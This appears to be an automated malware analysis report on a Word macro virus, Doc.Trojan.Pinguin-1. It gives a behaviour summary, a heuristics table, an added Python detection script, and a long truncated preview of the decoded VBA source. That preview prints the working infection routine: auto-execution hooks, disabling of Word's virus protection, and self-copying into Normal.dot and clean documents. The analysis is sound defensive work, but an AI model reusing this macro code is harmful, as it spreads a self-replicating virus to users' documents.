MALICIOUS
Risk Score: 360
Malware Insights
MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
The sample is a malicious Word document carrying VBA macros, identified by ClamAV as 'Doc.Trojan.Pinguin-1'; the macro source names itself 'Pinguin[Clau/UC]'. The auto-execution macros AutoNew, AutoOpen and AutoClose, together with the FileSave and FileSaveAs command interceptors, all call an 'Infection' subroutine. Infection exports the 'Pinguin' module to C:\Clau-UC.VXD, imports it into the Normal template (Normal.dot) if it is not already there, and imports it back from Normal.dot into any clean document, which is the classic global-template infection route of Word macro viruses. Before doing so it hides the VBA editor, turns off Word's virus protection and save prompts, and keeps auto macros enabled (WordBasic.DisableAutoMacros 0); AutoOpen and FileSaveAs then re-save the document in Word 97-2003 format so the macro travels with it. The module declares advapi32 registry functions (RegOpenKeyExA, RegSetValueExA, RegDeleteValueA and others), which is the basis of the T1547.001 mapping, and the heuristics flag a Shell() call, but neither the registry calls nor Shell() appear in the first 1,000 lines of the preview. The PayLoad routine is date-triggered: message boxes on the 1st and 8th of the month, the Tools > Macro menu caption renamed to 'Micro', and a 'UC' menu added; the Poly and Retro routines it calls fall outside the preview.
Heuristics (7)
| Finding | Severity | Rule | Description |
|---|---|---|---|
| ClamAV: Doc.Trojan.Pinguin-1 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Trojan.Pinguin-1 |
| VBA macros detected | medium | OLE_VBA_MACROS | Document contains VBA macro code (4 related findings) |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| AutoOpen macro | high | OLE_VBA_AUTOOPEN | AutoOpen macro |
| Auto_Close macro | high | OLE_VBA_AUTOCLOSE | Auto_Close macro |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Legacy WordBasic macro-virus markers | high | OLE_LEGACY_WORDBASIC_MACRO_VIRUS | OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them. |
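The heuristic findings above reduce to pattern checks over the decoded macro source. The following Python is an added example and not the analyzer's own code: it performs the same kind of triage (auto-execution entry points, Win32 API declarations, Normal template infection, security-setting tampering) over an excerpt condensed from the macro preview on this page, and derives a verdict the way the p-code heuristic does, by requiring an auto-execution token together with an execution or infection primitive. Rule ids, severities and the verdict thresholds are assumptions, not the analyzer's rule set.

```python
"""Static triage of decoded VBA source (added example, not the analyzer's code).
Rule ids, severities and the verdict logic below are illustrative."""
import re
from dataclasses import dataclass

# Word auto-execution entry points: legacy Auto* macros, Document_* event
# handlers, and built-in command names Word runs instead of its own menu actions.
AUTO_EXEC = {
    "autoexec", "autonew", "autoopen", "autoclose", "autoexit",
    "document_open", "document_close", "document_new",
    "filesave", "filesaveas", "fileopen", "fileexit",
}

SUB_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)", re.I | re.M)
DECLARE_RE = re.compile(
    r'^\s*(?:Public\s+|Private\s+)?Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]+)"',
    re.I | re.M)

# (rule id, severity, pattern): illustrative names, not the analyzer's rule ids.
SUSPICIOUS = [
    ("VBA_SHELL", "critical", re.compile(r"\bShell\s*\(", re.I)),
    ("VBA_CREATEOBJECT", "high", re.compile(r"\bCreateObject\s*\(", re.I)),
    ("VBA_NORMAL_TEMPLATE_INFECT", "critical",
     re.compile(r"NormalTemplate\.VBProject\.VBComponents\.Import", re.I)),
    ("VBA_MODULE_EXPORT", "high",
     re.compile(r"VBProject\.VBComponents\.Item\([^)]*\)\.Export", re.I)),
    ("VBA_SECURITY_TAMPER", "high",
     re.compile(r"WordBasic\.DisableAutoMacros|\.VirusProtection\s*=\s*False", re.I)),
    ("VBA_HIDE_VBE", "medium", re.compile(r"ShowVisualBasicEditor\s*=\s*False", re.I)),
    ("VBA_REGISTRY_API", "medium",
     re.compile(r"\bReg(?:OpenKeyEx|SetValueEx|QueryValueEx|DeleteValue)A?\b", re.I)),
]


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    detail: str


def triage_vba(source: str) -> list[Finding]:
    """Return de-duplicated findings for one decoded VBA module or project."""
    found: dict[Finding, None] = {}          # insertion-ordered set
    for m in SUB_RE.finditer(source):
        name = m.group(1)
        if name.lower() in AUTO_EXEC:
            found[Finding("VBA_AUTOEXEC", "high", f"auto-execution entry point {name}")] = None
    for m in DECLARE_RE.finditer(source):
        found[Finding("VBA_API_DECLARE", "medium", f"{m.group(1)} from {m.group(2)}")] = None
    for rule, sev, rx in SUSPICIOUS:
        for m in rx.finditer(source):
            found[Finding(rule, sev, m.group(0).strip())] = None
    return list(found)


def verdict(findings: list[Finding]) -> str:
    """Auto-execution plus an execution or infection primitive is what separates
    a macro virus from a document that merely carries macros."""
    has_autoexec = any(f.rule == "VBA_AUTOEXEC" for f in findings)
    has_critical = any(f.severity == "critical" for f in findings)
    if has_autoexec and has_critical:
        return "malicious"
    if has_autoexec or has_critical:
        return "suspicious"
    return "clean"


# Excerpt condensed from the macro preview on this page (the Pinguin sample);
# not a complete macro, just enough text for the rules to fire on.
SAMPLE = r'''
Declare Function RegOpenKeyExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Declare Function DeleteFileA Lib "kernel32.dll" (ByVal lpFileName As String) As Long
Global Const vir_module = "Pinguin"
Sub AutoNew()
Infection
End Sub
Sub AutoOpen()
Infection
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub
Sub AutoClose()
Infection
End Sub
Sub FileSave()
Infection
End Sub
Sub FileSaveAs()
Infection
End Sub
Sub Infection()
Application.ShowVisualBasicEditor = False
b = "C:\Clau-UC.VXD"
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
ActiveDocument.VBProject.vbcomponents.Item(vir_module).export (b)
NormalTemplate.VBProject.vbcomponents.Import (b)
DeleteFileA (b)
End Sub
'''

if __name__ == "__main__":
    results = triage_vba(SAMPLE)
    for f in results:
        print(f"{f.severity:8} {f.rule:28} {f.detail}")
    print("verdict:", verdict(results))
```

On the excerpt the Shell() rule does not fire, matching the preview: the verdict comes from the auto-execution entry points combined with the Normal template import. A real deployment would feed this the olevba output for every module rather than a hand-condensed excerpt, and would still need the p-code and WordBasic checks for documents whose source cannot be extracted.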
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19607 bytes | e07132bd8c6d3b8f3e815157d420f18e76e3c57de89153d297eec8220ac2f4fa | ClamAV: Doc.Trojan.Pinguin-1 | unlikely |
Preview script (first 1,000 lines of the extracted script)

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' --- Module1: the virus body (olevba concatenates module sources; ThisDocument above carries only attributes) ---
Attribute VB_Name = "Module1"
'
'Virus Name: Pinguin[Clau/UC]
'Created By Clau/Ultimate Chaos.
'
' Win32 registry and file APIs; only DeleteFileA is used in the visible portion.
Declare Function RegOpenKeyExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Declare Function RegQueryValueExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long
Declare Function RegSetValueExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpValue As String, ByVal cbData As Long) As Long
Declare Function RegDeleteValueA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String) As Long
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Declare Function DeleteFileA Lib "kernel32.dll" (ByVal lpFileName As String) As Long
Global Const REG_DWORD As Long = 4
Global Const REG_SZ As Long = 1
Global Const HKEY_CURRENT_USER As Long = &H80000001
Global Const HKEY_LOCAL_MACHINE As Long = &H80000002
Global Const vir_module = "Pinguin"
Dim k As Long
Dim s As Long
Dim u As Long
Dim a As Long
Dim b As String
' Auto macros: every new, opened or closed document re-runs Infection.
Sub AutoNew()
Infection
End Sub
Sub AutoOpen()
Infection
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub
Sub AutoClose()
Infection
End Sub
' Intercepts Word's built-in File > Save and File > Save As commands.
Sub FileSave()
Infection
ActiveDocument.Save
End Sub
Sub FileSaveAs()
Dialogs(wdDialogFileSaveAs).Show
Infection
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub
Sub Infection()
Application.ShowVisualBasicEditor = False
' Temp file used to carry the module between VBA projects.
b = "C:\Clau-UC.VXD"
' Poly and PayLoad run before the infection itself (Poly is outside the preview).
Poly
PayLoad
On Error Resume Next
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
' Silence Word: auto macros kept enabled, no virus-protection or Normal.dot save prompts.
WordBasic.DisableAutoMacros 0
With Options
.VirusProtection = False
.SaveNormalPrompt = False
.SavePropertiesPrompt = False
.ConfirmConversions = False
End With
' Is the "Pinguin" module already present in Normal.dot and in this document?
GlobalInstalled = False
DocumentInstalled = False
For i = 1 To NormalTemplate.VBProject.vbcomponents.Count
If NormalTemplate.VBProject.vbcomponents(i).Name = vir_module Then
GlobalInstalled = True
End If
Next
For i = 1 To ActiveDocument.VBProject.vbcomponents.Count
If ActiveDocument.VBProject.vbcomponents(i).Name = vir_module Then
DocumentInstalled = True
End If
Next
' Document -> Normal.dot: export the module to disk, import it into the global template, delete the file.
If GlobalInstalled = False Then
ActiveDocument.VBProject.vbcomponents.Item(vir_module).export (b)
NormalTemplate.VBProject.vbcomponents.Import (b)
DeleteFileA (b)
Options.SaveNormalPrompt = False
End If
' Normal.dot -> document: the reverse direction, so clean documents opened on an infected system get infected.
If DocumentInstalled = False Then
NormalTemplate.VBProject.vbcomponents.Item(vir_module).export (b)
ActiveDocument.VBProject.vbcomponents.Import (b)
DeleteFileA (b)
End If
Application.DisplayAlerts = wdAlertsAll
End Sub
' Date-triggered payload: message boxes on the 1st and 8th, Tools > Macro renamed to "Micro", a "UC" menu added.
Sub PayLoad()
On Error Resume Next
Retro
Randomize Timer
If Day(Now()) = 1 Then MsgBox "In every 2 of every month of every year" + Chr(13) + "I'll tell you my secret !!!", vbOKOnly, Date
If Day(Now()) = 8 Then
MsgBox "Pinguin Virus Created By Clau/Ultimate Chaos", vbOKOnly, "Secret Info"
CommandBars("tools").Controls("Macro").Caption = "Micro"
CommandBars.ActiveMenuBar.Controls.Item("UC").Delete
Set newMenu = CommandBars.ActiveMenuBar.Controls.Add(Type:=msoControlPopup, ID:=1, Temporary:=True)
newMenu.Caption = "&UC"
Set ctrl1 = newMenu.Controls.Add(Type:=msoControlButton, ID:=1)
ctrl1.Caption = "Pinguin"
ctrl1.TooltipText = "Pinguin"
ctrl1.Style = msoButtonCaption
ctrl1.OnAction = "VInfo"
Else
CommandBars.ActiveMenuBar.Controls.Item("UC").Delete
End If
If In
... (truncated)
```